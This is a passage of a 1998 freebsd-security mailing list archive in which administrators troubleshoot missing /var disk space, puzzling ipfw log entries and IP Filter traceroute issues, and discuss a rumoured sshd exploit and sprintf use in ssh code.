[206.28.0.58]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA21402 for ; Mon, 2 Nov 1998 22:22:03 -0800 (PST) (envelope-from pckizer@nostrum.com) Received: from mail.nostrum.com (pckizer@localhost [127.0.0.1]) by mail.nostrum.com (8.9.0/8.9.0) with ESMTP id AAA03417; Tue, 3 Nov 1998 00:21:28 -0600 From: Philip Kizer To: Jay Nelson cc: security@FreeBSD.ORG Subject: Re: hidden files question In-reply-to: Your message of "Mon, 02 Nov 1998 22:56:24 CST." Date: Tue, 03 Nov 1998 00:21:28 -0600 Message-ID: <3413.910074088@mail.nostrum.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jay Nelson wrote: >We have an office server running 2.2.7-RELEASE doing DNS, Samba and >mail. We have had several intrusion atempts over the past few weeks >that have failed. Today, /var was showing 50 MB and I could only >account for about 5MB. I could find no hidden files. > >Any combination I've used with find hasn't shown anything. Any ideas >on how I can find the missing 45MB? > >Is there a known benign condition that could account for this? Paranoia is good; but, yes, there is a possible benign condition. I haven't seen fuser available, but you can alway use lsof (/usr/ports/sysutils/lsof) to see if there are any processes that have open files in that filesystem that have been unlinked but not closed (A program, perhaps syslog, has open a logfile that was unlinked [via unlink(2) or rm(1) that calls unlink(2)], but not HUPped or otherwise told to close the open file that no longer has a directory entry pointing to it.) That condition can cause what you are seeing. If that is what you are seeing, then the cause may or may not be so benign, but the condition itself is. Start with lsof to see which files have open files in /var (when you get a NAME output that is only a mount-point, use find with the -inum option on that filesystem to locate a directory entry associated with the open file). If you find programs running with files open in /var but cannot find the file itself, there's your best candidate. If all program's open files are accounted for and can be found in some directory, then get worried. In that case, you do have good backups, right? :) -philip To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 22:40:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA24824 for freebsd-security-outgoing; Mon, 2 Nov 1998 22:40:49 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tok.qiv.com (tok.qiv.com [205.238.142.68]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA24810 for ; Mon, 2 Nov 1998 22:40:46 -0800 (PST) (envelope-from jdn@acp.qiv.com) Received: (from uucp@localhost) by tok.qiv.com (8.8.8/8.8.5) with UUCP id AAA08208; Tue, 3 Nov 1998 00:40:28 -0600 (CST) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.8/8.8.8) with SMTP id AAA02470; Tue, 3 Nov 1998 00:37:49 -0600 (CST) (envelope-from jdn@acp.qiv.com) Date: Tue, 3 Nov 1998 00:37:49 -0600 (CST) From: Jay Nelson To: Brett Glass cc: security@FreeBSD.ORG Subject: Re: hidden files question In-Reply-To: <4.1.19981102223232.0470a100@127.0.0.1> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Brett Glass wrote: >Look in logs that have turned over. You may see lots of messages >related to intrusion attempts. We did. I couldn't find any unexplainable successful connections unless they got a password and hacked something I'm not logging. Saw lots of attempts, though. Still, the unaccounted file usage makes me suspicious. What is the whiteout file attribute and how can I find it. The -W flag to ls doesn't seem to work. -- Jay To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 23:14:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA28692 for freebsd-security-outgoing; Mon, 2 Nov 1998 23:14:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from henry.cs.adfa.oz.au (henry.cs.adfa.oz.au [131.236.21.158]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA28680 for ; Mon, 2 Nov 1998 23:14:02 -0800 (PST) (envelope-from wkt@henry.cs.adfa.oz.au) Received: (from wkt@localhost) by henry.cs.adfa.oz.au (8.7.5/8.7.3) id SAA08483; Tue, 3 Nov 1998 18:14:05 +1100 (EST) From: Warren Toomey Message-Id: <199811030714.SAA08483@henry.cs.adfa.oz.au> Subject: Re: hidden files question To: jdn@acp.qiv.com (Jay Nelson) Date: Tue, 3 Nov 1998 18:14:04 +1100 (EST) Cc: security@FreeBSD.ORG In-Reply-To: from Jay Nelson at "Nov 2, 98 10:56:24 pm" Reply-To: wkt@cs.adfa.oz.au X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article by Jay Nelson: > that have failed. Today, /var was showing 50 MB and I could only > account for about 5MB. I could find no hidden files. > Any combination I've used with find hasn't shown anything. Any ideas > on how I can find the missing 45MB? > Is there a known benign condition that could account for this? If a process holds a file open, and you remove the file, then the directory entry is removed, but the file's inode and its contents still take space on the disk. You have to convince whichever process to close the file. Alternatively, you have to kill off the process, or shut the system down (at worst). Cheers, Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 00:17:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA04461 for freebsd-security-outgoing; Tue, 3 Nov 1998 00:17:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA04448 for ; Tue, 3 Nov 1998 00:17:04 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199811030817.AAA04448@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA263881001; Tue, 3 Nov 1998 19:16:41 +1100 From: Darren Reed Subject: Re: IPFW problems... To: junkmale@xtra.co.nz Date: Tue, 3 Nov 1998 19:16:41 +1100 (EDT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199811022300.MAA19467@cyclops.xtra.co.nz> from "Dan Langille" at Nov 3, 98 12:00:24 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Dan Langille, sie said: > > On 1 Nov 98, at 22:02, Darren Reed wrote: > > > In some mail from Dan Langille, sie said: > > > > > > On 29 Oct 98, at 21:45, Darren Reed wrote: > > > > > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version > > > > may not yet work. > > > > > > OK. Good! Can you guess when the other version will work? > > > > My testing shows "traceroute -I" to work properly with NAT. > > I'm not sure what "traceroute -I" does. I see no such option on > traceroute for FreeBSD 2.2.7. > > As for my traceroute problems, my mind is unclear. I admit that I didn't > take full notes. As such, I supply the following in the hopes that it may > trigger something when you read it. If it does not, then I will reinstall > IP Filter and get the full story. > > I'm using IP Filter 3.2.9 under FreeBSD 2.2.7 RELEASE. > > I believe I was able to traceroute when using NAT and without any deny > rules. When I tried to add in the example firewall rules (from > rules/BASIC_2.FW), I found that disabling the following rule allowed > traceroute to work: > > block in log quick all with short > > When this rule was present, traceroute did not work at all. Well, for whatever reason, I also appear to have licked this one in the most recent beta (3.2.10beta6) which I'm hoping to get out of beta RSN with as many of the niggling problems people are experiencing fixes as possible. I'm not sure why it should have been a problem, however, since that should (only) match tiny fragments. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 00:24:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA05816 for freebsd-security-outgoing; Tue, 3 Nov 1998 00:24:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from buddy.sovlink.ru (buddy.sovlink.ru [194.186.12.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA05811 for ; Tue, 3 Nov 1998 00:24:03 -0800 (PST) (envelope-from alla@sovlink.ru) Received: from sovlink.ru (punk.sovlink.ru [194.186.12.133]) by buddy.sovlink.ru (8.9.1/8.9.1) with ESMTP id LAA22211 for ; Tue, 3 Nov 1998 11:27:07 +0300 (MSK) Message-ID: <363EBD86.74C9F6E2@sovlink.ru> Date: Tue, 03 Nov 1998 11:23:34 +0300 From: Alla Bezroutchko X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: ru,en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Is it an attack? Strange things logged by ipfw. Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have an ipfw-based firewall and noticed a peculiar connections in its logs. Maybe this is some new kind of attack? Any comments appreciated. Here are the logs: Nov 3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP a.b.c.d:50818 aaa.aaa.aaa.aaa:1333 in via ex0 Nov 3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP e.f.g.h:50818 aaa.aaa.aaa.aaa:1565 in via ex0 Nov 2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP i.j.k.l:50818 aaa.aaa.aaa.aaa:1725 in via ex0 Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP m.n.o.p:50818 aaa.aaa.aaa.aaa:2349 in via ex0 Oct 20 09:22:35 buddy /kernel: ipfw: 65534 Deny TCP q.r.s.t:50818 aaa.aaa.aaa.aaa:1493 in via ex0 Oct 19 04:35:01 buddy /kernel: ipfw: 65534 Deny TCP u.v.w.x:50818 aaa.aaa.aaa.aaa:2465 in via ex0 aaa.aaa.aaa.aaa is an IP-address from my subnet that wasn't assigned to any host at the time this logs span. We have DHCP, so there may have been a machine that had this IP once, but now it is free. a.b.c.d - u.v.w.x are various hosts from all over the net, all different. Some university machines, some belong to businesses. Routing is blocked on the firewall so these packets are probably not replies to anything (especially because there is no such host - aaa.aaa.aaa.aaa). I have no address translation. What stumbles me is why they all use the same source port. Searched yahoo for it, didn't find anything. Thanks, Alla. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 00:24:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA05910 for freebsd-security-outgoing; Tue, 3 Nov 1998 00:24:40 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from witch.xtra.co.nz (witch.xtra.co.nz [202.27.184.8]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA05905 for ; Tue, 3 Nov 1998 00:24:34 -0800 (PST) (envelope-from junkmale@pop3.xtra.co.nz) Received: from wocker (210-55-210-87.ipnets.xtra.co.nz [210.55.210.87]) by witch.xtra.co.nz (8.9.1/8.9.1) with SMTP id VAA21281; Tue, 3 Nov 1998 21:24:11 +1300 (NZDT) Message-Id: <199811030824.VAA21281@witch.xtra.co.nz> From: "Dan Langille" Organization: DVL Software Limited To: Darren Reed Date: Tue, 3 Nov 1998 21:24:20 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: IPFW problems... Reply-to: junkmale@xtra.co.nz CC: freebsd-security@FreeBSD.ORG In-reply-to: <199811030816.VAA26113@predator.xtra.co.nz> References: <199811022300.MAA19467@cyclops.xtra.co.nz> from "Dan Langille" at Nov 3, 98 12:00:24 pm X-mailer: Pegasus Mail for Win32 (v3.01b) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 3 Nov 98, at 19:16, Darren Reed wrote: > In some mail from Dan Langille, sie said: > > > > As for my traceroute problems, my mind is unclear. I admit that I > > didn't take full notes. As such, I supply the following in the hopes > > that it may trigger something when you read it. If it does not, then I > > will reinstall IP Filter and get the full story. > > > > I'm using IP Filter 3.2.9 under FreeBSD 2.2.7 RELEASE. > > > > I believe I was able to traceroute when using NAT and without any deny > > rules. When I tried to add in the example firewall rules (from > > rules/BASIC_2.FW), I found that disabling the following rule allowed > > traceroute to work: > > > > block in log quick all with short > > > > When this rule was present, traceroute did not work at all. > > Well, for whatever reason, I also appear to have licked this one in the > most recent beta (3.2.10beta6) which I'm hoping to get out of beta RSN > with as many of the niggling problems people are experiencing fixes as > possible. > > I'm not sure why it should have been a problem, however, since > that should (only) match tiny fragments. Well, if it's any help, I'm willing to test with any beta objects you're willing to let me have. cheers. -- Dan Langille The FreeBSD Diary http://www.FreeBSDDiary.com/freebsd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 01:05:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA11666 for freebsd-security-outgoing; Tue, 3 Nov 1998 01:05:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gw.uct.kiev.ua (AS15.ACN-KVC5.ukrpack.net [195.230.152.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA11658 for ; Tue, 3 Nov 1998 01:05:16 -0800 (PST) (envelope-from gnut@uct.kiev.ua) Received: from localhost (gnut@localhost) by gw.uct.kiev.ua (8.8.8/8.8.8) with SMTP id LAA19968; Tue, 3 Nov 1998 11:06:48 +0200 (EET) (envelope-from gnut@uct.kiev.ua) Date: Tue, 3 Nov 1998 11:06:48 +0200 (EET) From: "Oles' Hnatkevych" To: Jay Nelson cc: security@FreeBSD.ORG Subject: Re: hidden files question In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Jay Nelson wrote: > Any combination I've used with find hasn't shown anything. Any ideas > on how I can find the missing 45MB? > I would do 'cd /var; du -k -d 1'. Best wishes, Oles Hnatkevych, http://gnut.kiev.ua To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 06:13:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA12519 for freebsd-security-outgoing; Tue, 3 Nov 1998 06:13:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phoenix (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id GAA12514 for ; Tue, 3 Nov 1998 06:13:01 -0800 (PST) (envelope-from brich@aye.net) Received: (qmail 29138 invoked by uid 7506); 3 Nov 1998 14:11:36 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Nov 1998 14:11:36 -0000 Date: Tue, 3 Nov 1998 09:11:36 -0500 (EST) From: Barrett Richardson To: "Oles' Hnatkevych" cc: Jay Nelson , security@FreeBSD.ORG Subject: Re: hidden files question In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Nov 1998, Oles' Hnatkevych wrote: > On Mon, 2 Nov 1998, Jay Nelson wrote: > > > Any combination I've used with find hasn't shown anything. Any ideas > > on how I can find the missing 45MB? > > > > I would do 'cd /var; du -k -d 1'. > Yeah, and if there is a big discrepancy between between df and du you might could (as a drastic measure) shut the machine off, run fsck on /var, and see if said unaccounted for usage appears in lost+found. You may be able to accomplish the same on a live file system (ask -hackers). > Best wishes, > > Oles Hnatkevych, http://gnut.kiev.ua > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 06:45:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA16517 for freebsd-security-outgoing; Tue, 3 Nov 1998 06:45:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA16507 for ; Tue, 3 Nov 1998 06:45:03 -0800 (PST) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.9.1/8.8.7) with ESMTP id JAA11634; Tue, 3 Nov 1998 09:44:37 -0500 (EST) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: Jay Nelson cc: security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: hidden files question In-reply-to: Your message of "Mon, 02 Nov 1998 22:56:24 CST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Nov 1998 09:44:37 -0500 Message-ID: <11630.910104277@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jay Nelson wrote in message ID : > Is there a known benign condition that could account for this? Try running fstat & friends to see if there is a file held open on /var. Its possible that a program opened up a file and it somehow got unlinked (a nightly tidy-up cron?) but the file is still held open. So its not visable via any directory, but its still there. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 07:25:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA21327 for freebsd-security-outgoing; Tue, 3 Nov 1998 07:25:51 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA21314 for ; Tue, 3 Nov 1998 07:25:39 -0800 (PST) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id RAA17585; Tue, 3 Nov 1998 17:24:20 +0200 (EET) Date: Tue, 3 Nov 1998 17:24:20 +0200 (EET) From: Narvi To: Barrett Richardson cc: "Oles' Hnatkevych" , Jay Nelson , security@FreeBSD.ORG Subject: Re: hidden files question In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Nov 1998, Barrett Richardson wrote: > > > On Tue, 3 Nov 1998, Oles' Hnatkevych wrote: > > > On Mon, 2 Nov 1998, Jay Nelson wrote: > > > > > Any combination I've used with find hasn't shown anything. Any ideas > > > on how I can find the missing 45MB? > > > > > > > I would do 'cd /var; du -k -d 1'. > > > > Yeah, and if there is a big discrepancy between between df and du you > might could (as a drastic measure) shut the machine off, run fsck > on /var, and see if said unaccounted for usage appears in lost+found. > > You may be able to accomplish the same on a live file system (ask > -hackers). > And one could use du -a to see whetever there were no files that ls was told not to show... Sander There is no love, no good, no happiness and no future - all these are just illusions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 14:10:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA18793 for freebsd-security-outgoing; Tue, 3 Nov 1998 14:00:55 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tok.qiv.com (tok.qiv.com [205.238.142.68]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA18763 for ; Tue, 3 Nov 1998 14:00:47 -0800 (PST) (envelope-from jdn@acp.qiv.com) Received: (from uucp@localhost) by tok.qiv.com (8.8.8/8.8.5) with UUCP id QAA11343 for security@FreeBSD.ORG; Tue, 3 Nov 1998 16:00:34 -0600 (CST) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.8/8.8.8) with SMTP id PAA01378 for ; Tue, 3 Nov 1998 15:50:07 -0600 (CST) (envelope-from jdn@acp.qiv.com) Date: Tue, 3 Nov 1998 15:50:07 -0600 (CST) From: Jay Nelson To: security@FreeBSD.ORG Subject: End of hidden files question In-Reply-To: <11630.910104277@gjp.erols.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks to everyone. Turns out, it was open Samba logs that I'd deleted over time. I'm ashamed to admit, I did it to myself. Killing the parent smbd seems to solve the problem with the usual wailing from users. Rebooting definately worked. I learned a lot from all your answers. Thank you. -- Jay To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 19:41:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA07283 for freebsd-security-outgoing; Tue, 3 Nov 1998 19:41:51 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA07278 for ; Tue, 3 Nov 1998 19:41:48 -0800 (PST) (envelope-from spork@super-g.com) Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.8/8.8.5) with SMTP id WAA12772; Tue, 3 Nov 1998 22:36:35 -0500 (EST) Date: Tue, 3 Nov 1998 22:36:35 -0500 (EST) From: spork X-Sender: spork@super-g.inch.com To: Andrew McNaughton cc: Warner Losh , bow , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry to bring this up again, but someone has posted on BugTraq stating they found a copy of an exploit for sshd (remote root). He claims to have tried it on his own machines with success. I know this could be entirely fake, but who really knows... I contacted him privately urging him to contact CERT, AUS-CERT, IBM-ERS, etc. and provide the code to them. I also requested more info about his OS and version, whether the patches that were supplied protected him, and which auth methods are allowed in his sshd_config. Sorry to bring this up again, but I thought perhaps the paranoid might be interested... Thanks, Charles --- Charles Sprickman spork@super-g.com On Tue, 3 Nov 1998, Andrew McNaughton wrote: > On Mon, 2 Nov 1998, Warner Losh wrote: > > > Just so everyone knows, this advisory was only a draft advisory and > > was cancelled over the weekend. I saw the original advisory and > > checked stuff in based on it, since generally changes like this are > > good and can't hurt anything. After I checked in the fixes to ssh, I > > discovered that it had been determined that there was no way of > > exploiting this buffer call because all the places that called it had > > bounds checking. > > I had a brief look over the ssh code some months ago. I didn't find > anything exploitable, but I did find things that made me uncomfortable, > like the logging routine that uses vsprintf (or something similarly > lacking in bounds checking) and expected all the places it was checked to > do the bounds checking. > > As far as I looked, they pretty much did, though in one place I noted that > it was dependent on the length of a domain name returned from a reverse > lookup. > > Andrew > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 20:38:14 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA14779 for freebsd-security-outgoing; Tue, 3 Nov 1998 20:38:14 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA14774 for ; Tue, 3 Nov 1998 20:38:12 -0800 (PST) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zauhh-0003TG-00; Tue, 3 Nov 1998 21:37:57 -0700 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id VAA26480; Tue, 3 Nov 1998 21:37:54 -0700 (MST) Message-Id: <199811040437.VAA26480@harmony.village.org> To: spork Subject: Re: [rootshell] Security Bulletin #25 (fwd) Cc: Andrew McNaughton , bow , FreeBSD-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Nov 1998 22:36:35 EST." References: Date: Tue, 03 Nov 1998 21:37:53 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message spork writes: : Sorry to bring this up again, but someone has posted on BugTraq stating : they found a copy of an exploit for sshd (remote root). He claims to have : tried it on his own machines with success. I saw that too, but realized that it wouldn't be a big deal to cope with because it was in the logging routines and would be caught by the extra sanity checking that we put in there. I've not seen his claims in any of the other security lists that I'm on yet... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 21:30:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA21032 for freebsd-security-outgoing; Tue, 3 Nov 1998 21:30:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA21015 for ; Tue, 3 Nov 1998 21:30:00 -0800 (PST) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1a/8.9.1) id QAA25905; Wed, 4 Nov 1998 16:29:40 +1100 (EST) Date: Wed, 4 Nov 1998 16:29:40 +1100 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: Warner Losh cc: FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: <199811040437.VAA26480@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well I just grabbed 1.2.26 and did: find . -exec grep sprintf {} \; |wc -l And came up with 138 lines. Just having sprintf() in your code is not indicative of a vulnerability, but it's still a high number. Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 21:31:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA21101 for freebsd-security-outgoing; Tue, 3 Nov 1998 21:31:56 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA21096 for ; Tue, 3 Nov 1998 21:31:53 -0800 (PST) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1a/8.9.1) id QAA26243; Wed, 4 Nov 1998 16:31:43 +1100 (EST) Date: Wed, 4 Nov 1998 16:31:42 +1100 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: freebsd-security@FreeBSD.ORG Subject: is ssh port patched? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is the port of ssh patched against the latest round of potential overflows reported in the IBM-ERS alert? Cheers, Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 22:07:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA25896 for freebsd-security-outgoing; Tue, 3 Nov 1998 22:07:13 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id WAA25887 for ; Tue, 3 Nov 1998 22:07:11 -0800 (PST) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zaw5n-0003W4-00; Tue, 3 Nov 1998 23:06:55 -0700 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id XAA26928; Tue, 3 Nov 1998 23:06:52 -0700 (MST) Message-Id: <199811040606.XAA26928@harmony.village.org> To: Nicholas Charles Brawn Subject: Re: [rootshell] Security Bulletin #25 (fwd) Cc: FreeBSD-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Nov 1998 16:29:40 +1100." References: Date: Tue, 03 Nov 1998 23:06:52 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Nicholas Charles Brawn writes: : find . -exec grep sprintf {} \; |wc -l : And came up with 138 lines. Just having sprintf() in your code is not True. If you look close at all of those, you will find that they are, for the most part, bounds checked in the code. While that doesn't pass the grep test, it does tend to make things more secure. Warner To Unsubscribe: send 